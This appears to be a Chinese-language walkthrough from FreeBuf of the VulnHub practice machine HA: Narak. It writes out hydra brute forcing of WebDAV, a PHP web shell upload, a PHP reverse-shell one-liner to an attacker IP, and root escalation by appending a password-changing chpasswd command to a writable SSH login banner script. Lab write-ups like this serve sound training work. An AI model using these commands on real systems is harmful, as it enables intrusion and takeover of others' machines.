基础信息
靶机链接:https://www.vulnhub.com/entry/ha-narak,569/
发布日期:2020/09/23
难度:容易/中等
目标:获取标志flag两个(user.txt和root.txt)
运行:VMware Workstation Pro
前言
本次靶机使用的VMware Workstation Pro进行搭建运行,将kali与靶机一样使用桥接模式。本次演练使用kali系统按照渗透测试的过程进行操作,在渗透的时候需要使用webdav漏洞上传木马脚本,在通过该脚本执行nc命令反弹shell,获取shell后,在www-data权限,通过破解密码获取第二个用户shell,最后进行提权。
一、信息收集
1.靶机ip
nmap 192.168.1.0/24
靶机地址为192.168.1.104
2.开放端口服务
nmap -sV -p- -O -A 192.168.1.104
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
3.网站信息
进入网页发现都是图片,查看源码也没有发现可以利用的信息
二、漏洞探测
1.目录扫描
http://192.168.1.104/
访问
http://192.168.1.104/webdav
使用cewl爬取该地址的信息,然后使用hydra进行爆破
cewl 192.168.1.104 -w pass.txt
hydra -L pass.txt -P pass.txt 192.168.1.104 http-get /webdav
用户: yamdoot 密码: Swarg
登录之后发现什么都没有
2.搜索webdav
发现了可以利用的漏洞
文章链接:https://charlesreid1.com/wiki/Metasploitable/Apache/DAV
三、漏洞利用
1.上传木马文件
cadaver http://192.168.1.104/webdav/
put 1.php
木马内容:<?php system($_GET['cmd']);?>
2.php反弹shell
在第一步上传了可以执行外部命令的木马文件经过测试,可以执行外部命令
php -r '$sock=fsockopen("192.168.1.107",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
python3 -c "import pty;pty.spawn('/bin/bash')" 升级交互式shell
3.获取user.txt
在/home/inferno发现第一个flag
4.信息收集
在/mnt目录下发现hell.sh,查看内容得到一串使用Brainfuck加密的字符串
经过破解获得明文密码
破解密码链接:https://www.splitbrain.org/services/ook
密码:chitragupt
猜测密码是ssh用户的,查看用户名inferno、narak、yamdoot
分别进行登录,在登录inferno用户时成功
四、提权
使用linpeas.sh查看了利用信息
搭建临时端口将脚本下载到/tmp目录下
赋予脚本执行权限
git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git
python3 -m http.server 8001
chmod 777 linpeas.sh
执行发现可写入文件
进入文件发现这是ssh登录时的欢迎界面
我们可以追加一条命令修改root密码,再重新登入ssh写入执行的命令
echo "echo 'root:admin' | sudo chpasswd" >> 00-header
提权成功
进入root路径下获取root.txt
总结
靶机不是很难适合练手,有利于训练自己的思维
来源:freebuf.com 2021-02-19 12:20:31 by: WAFmax
请登录后发表评论
注册